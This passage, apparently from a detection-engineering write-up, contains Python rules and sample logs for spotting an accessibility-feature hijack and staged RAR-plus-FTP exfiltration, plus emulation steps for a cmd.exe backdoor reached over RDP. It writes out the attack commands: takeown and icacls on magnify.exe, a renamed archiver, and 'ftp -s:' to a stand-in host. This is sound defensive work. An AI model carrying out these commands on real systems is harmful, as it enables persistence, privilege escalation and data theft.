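CHAIN_WINDOW = timedelta(hours=2)                       # max span from first to last step


def _image_name(e):
    return e.get("image", "").rsplit("\\", 1)[-1].lower()


def _cmd(e, pattern):
    return e["type"] == "process" and re.search(pattern, e.get("cmd", ""), re.I) is not None


# Each chain is an ordered list of (step, predicate). All steps must occur on the
# same host, in this order, within CHAIN_WINDOW of the first step.
CHAINS = {
    "accessibility_feature_hijack": [                    # Step 17
        ("takeown",   lambda e: _cmd(e, rf"\btakeown\b.*\b({ACC})\b")),
        ("icacls",    lambda e: _cmd(e, rf"\bicacls\b.*\b({ACC})\b")),
        ("overwrite", lambda e: e["type"] == "file_write"
                                and re.search(rf"\\system32\\({ACC})$", e["path"], re.I)
                                and _image_name(e) not in SERVICING),
    ],
    "staged_archive_ftp_exfil": [                        # Step 19
        ("renamed_archiver", lambda e: e["type"] == "process"
                                and e.get("original_file_name", "").lower() in ("rar.exe", "winrar.exe")
                                and _image_name(e) not in ("rar.exe", "winrar.exe")),
        ("archive_in_recycle_bin", lambda e: e["type"] == "file_write"
                                and re.search(r"\\\$recycle\.bin\\.*\.rar$", e["path"], re.I)),
        ("ftp_script", lambda e: _cmd(e, r"\bftp(\.exe)?\b.*\s-s:")),
        ("archive_deleted", lambda e: e["type"] == "file_delete"
                                and re.search(r"\\\$recycle\.bin\\.*\.rar$", e["path"], re.I)),
    ],
}


def ev(host, time, type, **fields):
    return {"host": host, "time": datetime.fromisoformat(time), "type": type, **fields}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Creeper (10.0.0.4): Step 17 as seen on the host
    ev("Creeper", "2018-10-30T15:10:00", "process", image=r"C:\Windows\System32\takeown.exe",
       cmd=r"takeown /f C:\Windows\System32\magnify.exe"),
    ev("Creeper", "2018-10-30T15:10:20", "process", image=r"C:\Windows\System32\icacls.exe",
       cmd=r"icacls C:\Windows\System32\magnify.exe /grant Administrators:F"),
    ev("Creeper", "2018-10-30T15:10:45", "file_write", image=PS, path=r"C:\Windows\System32\magnify.exe"),
    # Morris: Windows servicing rewriting sethc.exe (constructed; no takeown/icacls precede it)
    ev("Morris", "2018-10-30T15:12:00", "file_write", image=r"C:\Windows\WinSxS\servicing\TiWorker.exe",
       path=r"C:\Windows\System32\sethc.exe"),
    # CodeRed (10.0.1.5): Step 19 as seen on the host
    ev("CodeRed", "2018-10-30T16:00:00", "process", image=r"C:\Users\Bob\AppData\Local\Temp\recycler.exe",
       original_file_name="Rar.exe", cmd=r"recycler.exe a C:\$Recycle.Bin\old.rar Shockwave_network.vsdx"),
    ev("CodeRed", "2018-10-30T16:00:02", "file_write", image=r"C:\Users\Bob\AppData\Local\Temp\recycler.exe",
       path=r"C:\$Recycle.Bin\old.rar"),
    ev("CodeRed", "2018-10-30T16:01:10", "process", image=r"C:\Windows\System32\ftp.exe",
       cmd="ftp -s:ftp.txt 192.0.2.10"),
    ev("CodeRed", "2018-10-30T16:02:00", "file_delete", image=PS, path=r"C:\$Recycle.Bin\old.rar"),
]


def match_chain(steps, events):
    """Return the events of the first complete in-order occurrence of `steps` in
    a time-sorted stream, or None. Each candidate first step is tried in turn."""
    for i, first in enumerate(events):
        if not steps[0][1](first):
            continue
        matched, idx = [first], 1
        for e in events[i + 1:]:
            if e["time"] - first["time"] > CHAIN_WINDOW:
                break
            if steps[idx][1](e):
                matched.append(e)
                idx += 1
                if idx == len(steps):
                    return matched
    return None


def detect_chains(events):
    by_host = {}
    for e in events:
        by_host.setdefault(e["host"], []).append(e)
    hits = []
    for host in sorted(by_host):
        stream = sorted(by_host[host], key=lambda e: e["time"])
        for name, steps in CHAINS.items():
            m = match_chain(steps, stream)
            if m:
                hits.append({"chain": name, "host": host,
                             "steps": [(s, e.get("cmd") or e.get("path"))
                                       for (s, _), e in zip(steps, m)]})
    return hits
```

Two design points carry the weight here. The overwrite step excludes the Windows servicing images so a legitimate update to sethc.exe on Morris does not fire on its own, but it still fires on Creeper because takeown and icacls preceded the write; and the archiver step keys on the PE's OriginalFileName rather than the on-disk name, which is precisely the field a renamed WinRAR binary (19.A.1) cannot change without re-signing.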

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnify.exe, previously overwritten with cmd.exe, launched through an RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via the cmd persistence mechanism through the RDP connection made to Creeper (10.0.0.4)